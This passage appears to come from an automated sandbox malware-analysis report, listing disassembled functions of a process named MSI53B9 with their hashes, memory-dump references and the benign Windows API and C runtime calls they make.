                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                              • Instruction ID: 459efa9019c3fa7b508946108f4c1be71cbfb11f8f4aa0511c59e5f4c5f2678b
                                              • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                              • Instruction Fuzzy Hash: 1962327060478A9FC719EF28C8805B8BBE0FF55308F14866ED99AC7742E730E965CB85
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                              • Instruction ID: e2b03af143a143103ce3ee0580584061f9f758055e8b2b5bf7772e8ebdbc15a9
                                              • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                              • Instruction Fuzzy Hash: 975249B26087019FC758CF18C891A6AF7E1FFC8304F49892DF5969B255D734E919CB82
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 713e772aeaa5c516db01ea71920bf36a634867898cab53d891e686a11a69bb21
                                              • Instruction ID: 48cc22acee7e4d985ce1cf0fd13f0f63fa22127ba54ab50f7073c383adff0f83
                                              • Opcode Fuzzy Hash: 713e772aeaa5c516db01ea71920bf36a634867898cab53d891e686a11a69bb21
                                              • Instruction Fuzzy Hash: 8012E6B1604B068FC729EF28C9D06B9B3E1FF54308F14892DE597C7A81E774A8A5CB45
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c70d4f24eab11f170dd3377450475ab12c96cfc8edfdbaf08811209af63bfa21
                                              • Instruction ID: a061fdca7f08a9284f6caea7de843c346280b0a15c7ba8be247b5849c7dbf87e
                                              • Opcode Fuzzy Hash: c70d4f24eab11f170dd3377450475ab12c96cfc8edfdbaf08811209af63bfa21
                                              • Instruction Fuzzy Hash: A9F18971A083458FC715CE29C48466ABBE2FFD9714F188A2EF489D7359DB30E9058B42
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction ID: 7f062a5671ac90828f595c01ee1f7d4cc7b0e04944e8482d7cf2ef3756b29f5f
                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                              • Instruction Fuzzy Hash: 90C19F362050930ADB6D5639853413EBEA1EEA67B131A077DE5B7CB1D6FF20C524D720
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction ID: 93a96c43110abd3c9363ea7566ff51ab860d73cf6420a10b43de20d073c0aa05
                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                              • Instruction Fuzzy Hash: 93C170362091A30ADF6D5639C53403EBEA1EAA67B131A077DD9B6CB1D6FF20C524D720
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                              • Instruction ID: 89e71135f15104b79744c7c75cc630897d8d88e28cf0253569456e69b055defe
                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                              • Instruction Fuzzy Hash: 19C1A0362050930ADF6D967A853403EBEA1AEA27B131A077ED5B7CB1D6FF20C524D720
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction ID: ae8f1e07cde06171c8321af42f33d5d528d22c7b9bf031a9535128a713899e05
                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                              • Instruction Fuzzy Hash: 3FC180362090934ADF6D563AC53403EBFA1AAA67B131A07BDD5B6CB1C6FF20D524D720
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3ed66850edb3e5629a955afca177e3f4961236adcb174bdcb90b3a496b1154a8
                                              • Instruction ID: ff3c742f0a0a60dd1f551fd9cc2fc271632c878a7b6fd75f27336c77f1282486
                                              • Opcode Fuzzy Hash: 3ed66850edb3e5629a955afca177e3f4961236adcb174bdcb90b3a496b1154a8
                                              • Instruction Fuzzy Hash: 7CE1F2B95083948FD344CF69D89086BBBE0BBDA300F49495EF9D597362C234EA15CB62
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                              • Instruction ID: 279c6d2a21e8a1e1ded6c34e77f54fc99be0d147ff05d26a2971513d2b14d535
                                              • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                              • Instruction Fuzzy Hash: CA9166B02047498BD728FF68C894BBE73D5FB90304F10092DE69AC7282DAB5DA44C757
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 86dd04280afd63f01108e17e77486281698d63d1f62faca452c1a5f69046b971
                                              • Instruction ID: 800b239678d7be21754562b21d44ba66ba0323fce00c0c1318a7c7c940530951
                                              • Opcode Fuzzy Hash: 86dd04280afd63f01108e17e77486281698d63d1f62faca452c1a5f69046b971
                                              • Instruction Fuzzy Hash: 3E6168B160070CB6DE38BF2C8C95BFE63D8FB12758F1C0A19E842DB691D6119D828356
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                              • Instruction ID: c0f8e0f045fa2d86d7b5e4e30976c26e33afe321cda598dca627a600f0b93ed5
                                              • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                              • Instruction Fuzzy Hash: 9571257030438A5BDB24FE6CD8D4BAD37D1FB91B04F00492DE98ACB286DB74DA858756
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bef3f16cc0c4f77c20004e5b0736d2e18fd6caa9a81c3e33b2f5ddbe5016529f
                                              • Instruction ID: 1ec981e9ee873888c9cb5c808af011f44b36b455d385c61eb8d2d1405a5db74a
                                              • Opcode Fuzzy Hash: bef3f16cc0c4f77c20004e5b0736d2e18fd6caa9a81c3e33b2f5ddbe5016529f
                                              • Instruction Fuzzy Hash: 5B81A09221A2E45DD7068F7D38E42E53FA1BB73300F1C55AAC4C9C66B7C0369568D721
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0c3b2c285c2a32929f24858096ab199fc9cacfdd71c1866548cd8d68f937e9a
                                              • Instruction ID: 7ae69e1893e04662a8846f7b937d2b5d905b09df795649a6ede333cd3fbee7ee
                                              • Opcode Fuzzy Hash: c0c3b2c285c2a32929f24858096ab199fc9cacfdd71c1866548cd8d68f937e9a
                                              • Instruction Fuzzy Hash: 6D51CC756083954ED712CF29818046EBFF1FFDA324F49889EE4D98B256C230D68ADB52
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d6c3630af026bc64e73a6223a28ad4f3883afecc7172390ed57d0fdf78d5919
                                              • Instruction ID: 5eee0bf4ec75cd7d90f3eecfef004310fdf31598427bb6342a43775b8506fd39
                                              • Opcode Fuzzy Hash: 6d6c3630af026bc64e73a6223a28ad4f3883afecc7172390ed57d0fdf78d5919
                                              • Instruction Fuzzy Hash: 47512371A083068BC748CF19D48059AF7E1FBC8314F058A2EE899E7744DB34EA59CB96
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                              • Instruction ID: f0df8f576b88fed0cb2757a94f2bd6d852184bfc87f6bf8891005ce7c6f98b5c
                                              • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                              • Instruction Fuzzy Hash: 513105B160474A8FCB18EF28C85126EBBE0FB95710F00892DE4DAD7341C779E909CB52
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0ee0da09eb05b2c5d72f09def0539f148b5fecda8de6616bd2e114259a1d219
                                              • Instruction ID: d5a1f29f3e6d24959af7b07510ea96cc59df5a3baf00afb10cf592b39b1675c2
                                              • Opcode Fuzzy Hash: f0ee0da09eb05b2c5d72f09def0539f148b5fecda8de6616bd2e114259a1d219
                                              • Instruction Fuzzy Hash: 9321DA32A201655FDB08CF2DECA44367351F787311786C12FEA46CB6D5C635E925CBA0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0088AA4A
                                                • Part of subcall function 008896EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 008897B4
                                              • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0088A35D,?,00000000), ref: 0088AB7F
                                              • GetFileAttributesW.KERNEL32(?), ref: 0088AC39
                                              • DeleteFileW.KERNEL32(?), ref: 0088AC47
                                              • SetWindowTextW.USER32(?,?), ref: 0088AD90
                                              • _wcsrchr.LIBVCRUNTIME ref: 0088AF1A
                                              • GetDlgItem.USER32(?,00000066), ref: 0088AF55
                                              • SetWindowTextW.USER32(00000000,?), ref: 0088AF65
                                              • SendMessageW.USER32(00000000,00000143,00000000,008B412A), ref: 0088AF79
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0088AFA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                              • API String ID: 3676479488-312220925
                                              • Opcode ID: 9dff886a3c61d433ed9600e6a5d92c7d90ea90e02aa54e945f38dc525f6d44c2
                                              • Instruction ID: c718ee65a4da757e39a1b4c14e9c16b1e4cf1fd828b34ab1211fedc022ecec5b
                                              • Opcode Fuzzy Hash: 9dff886a3c61d433ed9600e6a5d92c7d90ea90e02aa54e945f38dc525f6d44c2
                                              • Instruction Fuzzy Hash: 86E14B72900119AAEF24FBA4DD85EEE737CFB45350F1440A6F519E3181EB749B848F62
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 008995D1
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 00899189
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 0089919B
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 008991AD
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 008991BF
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 008991D1
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 008991E3
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 008991F5
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 00899207
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 00899219
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 0089922B
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 0089923D
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 0089924F
                                                • Part of subcall function 0089916C: _free.LIBCMT ref: 00899261
                                              • _free.LIBCMT ref: 008995C6
                                                • Part of subcall function 008959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?), ref: 008959D8
                                                • Part of subcall function 008959C2: GetLastError.KERNEL32(?,?,00899301,?,00000000,?,00000000,?,00899328,?,00000007,?,?,00899725,?,?), ref: 008959EA
                                              • _free.LIBCMT ref: 008995E8
                                              • _free.LIBCMT ref: 008995FD
                                              • _free.LIBCMT ref: 00899608
                                              • _free.LIBCMT ref: 0089962A
                                              • _free.LIBCMT ref: 0089963D
                                              • _free.LIBCMT ref: 0089964B
                                              • _free.LIBCMT ref: 00899656
                                              • _free.LIBCMT ref: 0089968E
                                              • _free.LIBCMT ref: 00899695
                                              • _free.LIBCMT ref: 008996B2
                                              • _free.LIBCMT ref: 008996CA
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 52ef9a6a941dacaa6ffa0c9a9a3ee992f34a1b3026001c28e40208e5d5db2acb
                                              • Instruction ID: 9b8bd0d2f0f14ef3227c44121e4cb5e15550288d4424805cb48f87aec98147e3
                                              • Opcode Fuzzy Hash: 52ef9a6a941dacaa6ffa0c9a9a3ee992f34a1b3026001c28e40208e5d5db2acb
                                              • Instruction Fuzzy Hash: 51310671604701EFEF22BA7DE845B5A77E9FB11320F18846DE4D9D6151DE35AC80CB12
                                              APIs
                                              • GetWindow.USER32(?,00000005), ref: 0088B8DD
                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0088B90C
                                                • Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0088B92A
                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0088B941
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0088B954
                                                • Part of subcall function 00888B22: GetDC.USER32(00000000), ref: 00888B2E
                                                • Part of subcall function 00888B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00888B3D
                                                • Part of subcall function 00888B22: ReleaseDC.USER32(00000000,00000000), ref: 00888B4B
                                                • Part of subcall function 00888ADF: GetDC.USER32(00000000), ref: 00888AEB
                                                • Part of subcall function 00888ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00888AFA
                                                • Part of subcall function 00888ADF: ReleaseDC.USER32(00000000,00000000), ref: 00888B08
                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0088B97B
                                              • DeleteObject.GDI32(00000000), ref: 0088B982
                                              • GetWindow.USER32(00000000,00000002), ref: 0088B98B
                                              Strings
                                              Memory Dump Source
